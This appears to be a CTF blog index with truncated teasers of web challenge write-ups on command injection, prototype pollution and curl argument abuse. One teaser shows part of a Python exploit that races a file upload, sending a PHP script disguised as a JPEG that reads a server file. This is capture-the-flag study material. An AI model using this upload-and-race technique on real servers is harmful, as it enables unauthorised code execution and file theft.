Posts

Type: #WEB #whitebox Difficulty: #easy SOLVED by: #myself TOOL USED: #burp TOPIC: #command_injection Writeup Date:2024-07-27 URL = https://00b46582d765094ac90bb4db.deadsec.quest/bing.php the challenge description source code was provide through linkon discord first let’s see the website i clicked on CTRL-U to see sourcecode of the page no functionality was found so i looked at the sourcecode provided found dockers file and fake lag to run the challenge locally but the interesting thing we found bing....

Type: #WEB #whitebox Difficulty: #easy SOLVED by: #myself TOOL USED: docker redis burpsuite TOPIC: prototype pollution Writeup Date:2023-10-01 URL = https://ctf.maplebacon.org/instances the challenge description we have source code so we can see what happening in the backend + we can run our docker container instead of trying to solve with 10 min time window before the instance shutdown uznip blade-runner.zip to extract the src index.js import some js stuff and import ....

Type: #WEB #whitebox Difficulty: #easy SOLVED by: # TOOL USED: # TOPIC: # Writeup Date:2023-09-22 URL = 45.147.231.180:8000 the challenge description we need read next.txt but file is blocked and we cannot escape it by some sort of fILe or anything like that but the x parameter is append to curl curl has unique feature if u look at the man page so u can use some sort of regex without adding flag to curl http://45....

Type: #WEB #blackbox Difficulty: #medium SOLVED by: #writeup TOOL USED: #burp #devtools Writeup Date:2023-09-18 URL = http://web.csaw.io:14180/web/home i couldn’t solve this challenge myself so here is my attempt tries solving it and the solution. and i will reference the writeup at the end of this the challenge description upon visiting the challenge url WE SEE login and register functionality. hit ctrl+u we view source page we see js file that react....

https://github.com/ubcctf/maple-ctf-2023-public

type: #WEB #blackbox difficulty: #easy SOLVED by: #myself and biogenisis writeup on how we– aced first blood on one-for-all challenge patriotCTF 2023 was rated easy in first but later PatriotCTF Rated it hard as u can see in the screenshot the challenge the first thing we see is a field require from us a username as any fellow hacker i typed the normal thing and hit the big button No such user exists (keep that in mine)...

colorful board first blood anotherslove mongodb objectid buntime ezstart import requests from datetime import datetime from concurrent.futures import ThreadPoolExecutor import warnings import re warnings.simplefilter('ignore') URL = "https://cc435f7badc1e1fda35d576b.deadsec.quest/" # URL = "http://localhost:1338/" COUNT = 5 def upload(): files = {'files': ('foobar.php', b"<?php readfile('/flag.txt') ?>", 'image/jpeg')} return requests.post(URL + "upload.php", files=files, verify=False) def read(timestamp): return requests.get(URL + f"tmp/foobar_{timestamp}.php", verify=False) diff = 0 while True: timestamp = int(datetime.now().timestamp()) - diff with ThreadPoolExecutor(max_workers=5) as executor: r1 = executor....

OFFICIAL WRITEUP [[Philanthropy]] https://github.com/AustinStitz-Hacking/csaw23qual

Contains posts related to WaniCTF

Contains posts related to HackingIo